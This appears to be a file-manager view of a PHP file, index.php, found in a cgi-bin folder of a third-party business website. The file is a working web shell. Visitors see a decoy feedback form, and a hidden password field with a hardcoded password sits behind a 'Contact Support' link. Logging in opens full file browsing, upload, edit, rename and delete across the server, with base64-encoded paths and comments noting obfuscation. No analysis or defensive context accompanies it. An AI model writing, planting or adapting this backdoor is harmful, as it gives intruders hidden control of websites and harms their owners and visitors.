Tiny File Manager | index.php

File: index.php
Full Path: /home2/branding/public_html/shreeenterprisesepoxy.in/cgi-bin/559676/index.php
File size: 10.81 KB
MIME-type: text/x-php
Charset: utf-8
Delete Open Edit Advanced Editor Back
<?php
// Start session
session_start();

// Handle logout request
if (isset($_GET['logout'])) {
    unset($_SESSION['authenticated']);
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

// Check if authenticated
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
    // Handle login request
    if (isset($_POST['password']) && $_POST['password'] === 'secretpassword') {
        $_SESSION['authenticated'] = true;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    } else {
        // Display disguised feedback form page
        echo "<h2>Website Feedback Form</h2>";
        echo "<p>Please fill out the form below to send us your feedback.</p>";
        echo "<form method='POST' action=''>";
        echo "<input type='text' name='username' placeholder='Your Name' /><br>";
        echo "<input type='email' name='email' placeholder='Your Email' /><br>";
        echo "<textarea name='feedback' placeholder='Your Feedback'></textarea><br>";
        echo "<input type='submit' value='Submit' />";
        echo "</form>";
        echo "<p><a href='#' onclick='showLoginForm()'>Contact Support</a></p>";
        echo "<div id='login-form' style='display: none;'>";
        echo "<form method='POST' action=''>";
        echo "<input type='password' name='password' placeholder='Password' />";
        echo "<input type='submit' value='Login' />";
        echo "</form>";
        echo "</div>";
        echo "<script>";
        echo "function showLoginForm() {";
        echo "document.getElementById('login-form').style.display = 'block';";
        echo "}";
        echo "</script>";
        if (isset($_POST['password'])) {
            echo "<p style='color: red;'>Invalid password.</p>";
        }
        exit;
    }
}

// File management functionality (accessible only after authentication)

// Display random string for obfuscation
function randomFunction() {
    $randomString = bin2hex(random_bytes(96));
    return $randomString;
}

$randomString = randomFunction();
echo "<p style='color: green;'>Random String: $randomString</p>";

// Display system information
function systemCheck() {
    $info = php_uname();
    $phpVersion = phpversion();
    echo "<p style='color: green;'>System Info: $info | PHP Version: $phpVersion</p>";
}

systemCheck();

$special_chars = "%00%0A%09//#";

// Command encoding and decoding functions
function encodeCommand($command) {
    return base64_encode($command);
}

function decodeCommand($encoded) {
    return base64_decode($encoded);
}

// Display directory listing
function displayDirectory($path) {
    global $special_chars;
    $items = array_diff(scandir($path), ['.', '..']);
    echo "<h3 style='color: green;'>Current Directory: $path</h3><ul>";
    foreach ($items as $item) {
        $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item);
        if (is_dir($itemPath)) {
            $navigateCommand = encodeCommand('navigate|' . $itemPath);
            echo "<li><a href='?data=$navigateCommand'>$item</a></li>";
        } else {
            $editCommand = encodeCommand('action|edit|' . $path . '|' . $item);
            $deleteCommand = encodeCommand('action|delete|' . $path . '|' . $item);
            $renameCommand = encodeCommand('action|rename|' . $path . '|' . $item);
            echo "<li>$item <a href='?data=$editCommand'>$special_chars Edit</a> | 
                          <a href='?data=$deleteCommand'>$special_chars Delete</a> | 
                          <a href='?data=$renameCommand'>$special_chars Rename</a></li>";
        }
    }
    echo "</ul>";
}

// Handle file upload
function handleFileUpload($path) {
    if (!empty($_FILES['file']['name'])) {
        $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
        if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
            echo "<p style='color: green;'>File uploaded successfully!</p>";
        } else {
            echo "<p style='color: red;'>Failed to upload file.</p>";
        }
    }
}

// Create new folder
function createNewFolder($path) {
    if (!empty($_POST['folder_name'])) {
        $folderPath = $path . DIRECTORY_SEPARATOR . $_POST['folder_name'];
        if (!file_exists($folderPath)) {
            mkdir($folderPath);
            echo "<p style='color: green;'>Folder created: {$_POST['folder_name']}</p>";
        } else {
            echo "<p style='color: red;'>Folder already exists.</p>";
        }
    }
}

// Create new file
function createNewFile($path) {
    if (!empty($_POST['file_name'])) {
        $filePath = $path . DIRECTORY_SEPARATOR . $_POST['file_name'];
        if (!file_exists($filePath)) {
            file_put_contents($filePath, '');
            echo "<p style='color: green;'>File created: {$_POST['file_name']}</p>";
        } else {
            echo "<p style='color: red;'>File already exists.</p>";
        }
    }
}

// Display file edit form
function displayEditForm($filePath, $path) {
    $content = file_exists($filePath) ? htmlspecialchars(file_get_contents($filePath)) : '';
    echo "<form method='POST' action='?data=" . encodeCommand('action|edit|' . $path . '|' . basename($filePath)) . "'>
            <textarea name='content' style='width:100%; height:300px;'>$content</textarea><br>
            <button type='submit'>Save</button>
          </form>";
}

// Delete file
function deleteFile($filePath) {
    if (file_exists($filePath)) {
        if (unlink($filePath)) {
            echo "<p style='color: green;'>File deleted successfully.</p>";
        } else {
            echo "<p style='color: red;'>Failed to delete file.</p>";
        }
    } else {
        echo "<p style='color: red;'>File does not exist.</p>";
    }
}

// Display rename form
function displayRenameForm($itemPath, $path) {
    echo "<form method='POST' action='?data=" . encodeCommand('action|rename|' . $path . '|' . basename($itemPath)) . "'>
            <input type='text' name='new_name' placeholder='New Name'>
            <button type='submit'>Rename</button>
          </form>";
}

// Handle POST requests
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_GET['data'])) {
        $command = decodeCommand($_GET['data']);
        $parts = explode('|', $command, 4);
        if ($parts[0] == 'action' && $parts[1] == 'edit') {
            $path = $parts[2];
            $item = $parts[3];
            $itemPath = $path . DIRECTORY_SEPARATOR . $item;
            if (isset($_POST['content'])) {
                file_put_contents($itemPath, $_POST['content']);
                echo "<p style='color: green;'>File updated successfully!</p>";
            }
        } elseif ($parts[0] == 'action' && $parts[1] == 'rename') {
            $path = $parts[2];
            $item = $parts[3];
            $itemPath = $path . DIRECTORY_SEPARATOR . $item;
            if (isset($_POST['new_name'])) {
                $newPath = $path . DIRECTORY_SEPARATOR . $_POST['new_name'];
                if (rename($itemPath, $newPath)) {
                    echo "<p style='color: green;'>Item renamed successfully.</p>";
                } else {
                    echo "<p style='color: red;'>Failed to rename item.</p>";
                }
            }
        } elseif ($parts[0] == 'navigate') {
            $path = $parts[1];
            if (isset($_FILES['file'])) {
                handleFileUpload($path);
            } elseif (isset($_POST['folder_name'])) {
                createNewFolder($path);
            } elseif (isset($_POST['file_name'])) {
                createNewFile($path);
            }
        }
        $navigateCommand = encodeCommand('navigate|' . $path);
        header("Location: ?data=$navigateCommand");
        exit;
    }
}

// Handle GET requests
if (isset($_GET['data'])) {
    $command = decodeCommand($_GET['data']);
    $parts = explode('|', $command, 4);
    if ($parts[0] == 'navigate') {
        $path = $parts[1];
        $parentPath = dirname($path);
        $goUpCommand = encodeCommand('navigate|' . $parentPath);
        echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>";
        displayDirectory($path);
        echo "<h3 style='color: green;'>Upload File</h3>
              <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='file' name='file'><button type='submit'>$special_chars Upload</button>
              </form>";
        echo "<h3 style='color: green;'>Create Folder</h3>
              <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button>
              </form>";
        echo "<h3 style='color: green;'>Create File</h3>
              <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
                <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button>
              </form>";
    } elseif ($parts[0] == 'action') {
        $action = $parts[1];
        $path = $parts[2];
        $item = $parts[3];
        $itemPath = $path . DIRECTORY_SEPARATOR . $item;
        if ($action == 'delete') {
            deleteFile($itemPath);
            $navigateCommand = encodeCommand('navigate|' . $path);
            header("Location: ?data=$navigateCommand");
            exit;
        } elseif ($action == 'edit') {
            displayEditForm($itemPath, $path);
        } elseif ($action == 'rename') {
            displayRenameForm($itemPath, $path);
        }
    }
} else {
    $path = getcwd();
    $parentPath = dirname($path);
    $goUpCommand = encodeCommand('navigate|' . $parentPath);
    echo "<a href='?data=$goUpCommand'>$special_chars Go Up</a>";
    displayDirectory($path);
    echo "<h3 style='color: green;'>Upload File</h3>
          <form method='POST' enctype='multipart/form-data' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='file' name='file'><button type='submit'>$special_chars Upload</button>
          </form>";
    echo "<h3 style='color: green;'>Create Folder</h3>
          <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>$special_chars Create</button>
          </form>";
    echo "<h3 style='color: green;'>Create File</h3>
          <form method='POST' action='?data=" . encodeCommand('navigate|' . $path) . "'>
            <input type='text' name='file_name' placeholder='File Name'><button type='submit'>$special_chars Create</button>
          </form>";
}

// Add logout link
echo "<br><a href='?logout=1'>Logout</a>";
?>